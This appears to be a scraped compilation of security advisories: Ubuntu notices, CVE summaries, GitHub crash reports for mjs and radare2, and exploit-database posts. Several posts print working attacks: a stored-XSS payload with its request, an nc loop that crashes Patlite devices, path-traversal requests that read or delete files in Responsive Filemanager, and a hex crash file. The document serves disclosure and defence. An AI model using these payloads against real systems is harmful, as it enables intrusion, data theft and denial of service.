In zulip before 1.3.12, bot API keys were accessible to other users in the same realm.

CVE-2016-4426: Version History — Zulip 2.1.7 documentation

Ubuntu Security Notice 5535-1 - Joseph Nuzman discovered that some Intel processors did not properly initialise shared resources. A local attacker could use this to obtain sensitive information. Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel processors did not prevent test and debug logic from being activated at runtime. A local attacker could use this to escalate privileges.

==========================================================================  
Ubuntu Security Notice USN-5535-1  
July 28, 2022

Intel Microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

Joseph Nuzman discovered that some Intel processors did not properly  
initialise shared resources. A local attacker could use this to obtain  
sensitive information. (CVE-2021-0145)

Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel  
processors did not prevent test and debug logic from being activated at  
runtime. A local attacker could use this to escalate  
privileges. (CVE-2021-0146)

It was discovered that some Intel processors did not implement sufficient  
control flow management. A local attacker could use this to cause a denial  
of service (system crash). (CVE-2021-0127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123,  
CVE-2022-21127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

Alysa Milburn, Jason Brandt, Avishai Redelman and Nir Lavi discovered that  
some Intel processors improperly optimised security-critical code. A local  
attacker could possibly use this to expose sensitive  
information. (CVE-2022-21151)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

It was discovered that some Intel processors did not properly restrict  
access in some situations. A local attacker could use this to obtain  
sensitive information. (CVE-2021-33117)

Brandon Miller discovered that some Intel processors did not properly  
restrict access in some situations. A local attacker could use this to  
obtain sensitive information or a remote attacker could use this to  
cause a denial of service (system crash). (CVE-2021-33120)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
intel-microcode 3.20220510.0ubuntu0.16.04.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5535-1  
CVE-2021-0127, CVE-2021-0145, CVE-2021-0146, CVE-2021-33117,  
CVE-2021-33120, CVE-2022-21123, CVE-2022-21125, CVE-2022-21127,  
CVE-2022-21151, CVE-2022-21166

Ubuntu Security Notice USN-5535-1

A stored cross-site scripting (XSS) vulnerability in /nav_bar_action.php of Student Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Chat box.

    # Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
    # Date: 2021-05-13
    # Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com
    # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
    # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
    # Version: 1.0
    # Tested on: ubuntu 20.04.2
    
    # --- Description --- #
    
    # The web application allows for an  Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. 
    
    
    # --- Proof of concept --- #
    
    1- Login to Student Management System
    2- Click on Live Chat button
    3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
    5- Xss popup will be triggered.
    
    
    # --- Malicious Request --- #
    
    POST /nav_bar_action.php HTTP/1.1
    Host: (HOST)
    Cookie: (PHPSESSID)
    Content-Length: 96
    
    send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>

CVE-2021-33371: Offensive Security’s Exploit Database Archive

Ubuntu Security Notice 5532-1 - It was discovered that Bottle incorrectly handled errors during early request binding. An attacker could possibly use this issue to disclose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5532-1  
July 26, 2022

python-bottle vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Bottle could be made to leak sensitive information if it received a specially  
crafted request.

Software Description:  
- python-bottle: fast and simple WSGI-framework for Python

Details:

It was discovered that Bottle incorrectly handled errors during early request   
binding. An attacker could possibly use this issue to disclose sensitve   
information. (CVE-2022-31799)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python3-bottle                  0.12.19-1+deb11u1build0.22.04.1

Ubuntu 20.04 LTS:  
  python3-bottle                  0.12.15-2.1ubuntu0.2

Ubuntu 18.04 LTS:  
  python-bottle                   0.12.13-1ubuntu0.2  
  python3-bottle                  0.12.13-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5532-1  
  CVE-2022-31799

Package Information:  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.19-1+deb11u1build0.22.04.1  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.15-2.1ubuntu0.2  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.13-1ubuntu0.2

Ubuntu Security Notice USN-5532-1

An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow

ASAN info:

ASAN:SIGSEGV
=================================================================
==10560\==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0)
    #0 0x7fffe904938f  (<unknown module>)

SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==10560\==ABORTING

1 participant

CVE-2021-33448: AddressSanitizer: stack-buffer-overflow in <unknown module> · Issue #170 · cesanta/mjs

An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen\_cb-memory-leak

ASAN info:

\==29407\==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 37331 byte(s) in 1 object(s) allocated from:
    #0 0x7f151fe52602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42ffcd in frozen\_cb  test/mjs-uaf/build\_asan/mjs.c:12025
    #2 0x4092c4 in json\_parse\_string  test/mjs-uaf/build\_asan/mjs.c:5898
    #3 0x40b482 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5993
    #4 0x40aa25 in json\_parse\_array  test/mjs-uaf/build\_asan/mjs.c:5958
    #5 0x40b4c4 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:6000
    #6 0x40b863 in json\_parse\_pair  test/mjs-uaf/build\_asan/mjs.c:6058
    #7 0x40bc63 in json\_parse\_object  test/mjs-uaf/build\_asan/mjs.c:6070
    #8 0x40b4a3 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5996
    #9 0x40c135 in json\_doit  test/mjs-uaf/build\_asan/mjs.c:6083
    #10 0x40f2aa in json\_walk  test/mjs-uaf/build\_asan/mjs.c:6466
    #11 0x4309d9 in mjs\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12133
    #12 0x430f11 in mjs\_op\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12193
    #13 0x42572a in mjs\_execute  test/mjs-uaf/build\_asan/mjs.c:9648
    #14 0x4265f1 in mjs\_exec\_internal  test/mjs-uaf/build\_asan/mjs.c:9866
    #15 0x426873 in mjs\_exec\_file  test/mjs-uaf/build\_asan/mjs.c:9889
    #16 0x431348 in main  test/mjs-uaf/build\_asan/mjs.c:12228
    #17 0x7f151f80c82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s).

1 participant

CVE-2021-33437: AddressSanitizer: 1 memory leaks of frozen_cb() · Issue #160 · cesanta/mjs

Ubuntu Security Notice 5530-1 - It was discovered that PHP incorrectly handled certain memory operations when obtaining file information. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5530-1July 25, 2022php8.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PHP could be made to crash or run programs if it processed speciallycrafted data.Software Description:- php8.1: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain memory operationswhen obtaining file information. A remote attacker could use this issue tocause PHP to crash, resulting in a denial of service, or possibly executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libapache2-mod-php8.1           8.1.2-1ubuntu2.2  php8.1-cgi                      8.1.2-1ubuntu2.2  php8.1-cli                      8.1.2-1ubuntu2.2  php8.1-fpm                      8.1.2-1ubuntu2.2  php8.1-mysql                    8.1.2-1ubuntu2.2  php8.1-pgsql                    8.1.2-1ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5530-1  CVE-2022-31627Package Information:  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.2

Ubuntu Security Notice USN-5530-1

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

    # Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do   echo "[$i]: ";   echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1

Patlite 1.46 Buffer Overflow

A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

CVE-2017-20145: Full Disclosure: Responsive Filemanger <= 9.11.0

Radare2 v5.7.0 was discovered to contain a heap buffer overflow via the function consume_encoded_name_new at format/wasm/wasm.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted binary file.

**Environment**

Mon Jun 20 03:01:00 PM CST 2022
radare2 5.7.0 28296 @ linux-x86-64 git.5.7.0
commit: 09569c1d5c324df7f23bdc9ad864ac1c25925745 build: 2022-06-20\_\_11:48:07
Linux x86\_64

**Description**

After 5.7.0 release, a heap buffer overflow can be found in function consume_encoded_name_new in format/wasm/wasm.c via openning a crafted binary file with r2.

**Test**

1.  Build Radare2 with AddressSanitizer enabled. (Just execute ./sys/sanitize.sh)
2.  Make a PoC file with size of just 38 bytes. Save the content below as hex.txt

    00000000: 0061 736d 7f00 0000 0001 0dff 7436 ff8b  .asm........t6..
    00000010: 3000 3e01 499f 1000 fc00 7f45 4c46 80ff  0.>.I......ELF..
    00000020: fe61 73ff 0240                           .as..@
    

xxd -r hex.txt > PoCfile to create the poc file  
3\. r2 PoCfile

    ==1862034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000156b8 at pc 0x7fd01225622c bp 0x7ffc007f6a20 sp 0x7ffc007f6a10
    WRITE of size 1 at 0x6060000156b8 thread T0
        #0 0x7fd01225622b in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:147
        #1 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955
        #2 0x7fd01225b053 in r_bin_wasm_init /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:872
        #3 0x7fd0122501e2 in load_buffer /home/ubuntu/radare2/libr/..//libr/bin/p/bin_wasm.c:29
        #4 0x7fd011e1352c in r_bin_object_new /home/ubuntu/radare2/libr/bin/bobj.c:149
        #5 0x7fd011e08513 in r_bin_file_new_from_buffer /home/ubuntu/radare2/libr/bin/bfile.c:592
        #6 0x7fd011dc5baa in r_bin_open_buf /home/ubuntu/radare2/libr/bin/bin.c:285
        #7 0x7fd011dc6996 in r_bin_open_io /home/ubuntu/radare2/libr/bin/bin.c:345
        #8 0x7fd0142a6b57 in r_core_file_do_load_for_io_plugin /home/ubuntu/radare2/libr/core/cfile.c:436
        #9 0x7fd0142a96fb in r_core_bin_load /home/ubuntu/radare2/libr/core/cfile.c:637
        #10 0x7fd019bb1d8f in r_main_radare2 /home/ubuntu/radare2/libr/main/radare2.c:1256
        #11 0x5557ff52696e in main /home/ubuntu/radare2/binr/radare2/radare2.c:104
        #12 0x7fd018faf082 in __libc_start_main ../csu/libc-start.c:308
        #13 0x5557ff52630d in _start (/home/ubuntu/radare2/binr/radare2/radare2+0x230d)
    
    0x6060000156b8 is located 2 bytes to the right of 54-byte region [0x606000015680,0x6060000156b6)
    allocated by thread T0 here:
        #0 0x7fd01ad24808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x7fd0122552f4 in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:133
        #2 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955
    

The vulnerable code is introduced in b0129d7#diff-4d372afc1ec76c51b9f2f402ae1b543c699030475eb192b8d49ec8dd47f04b0cR132-R147

Tag

#ubuntu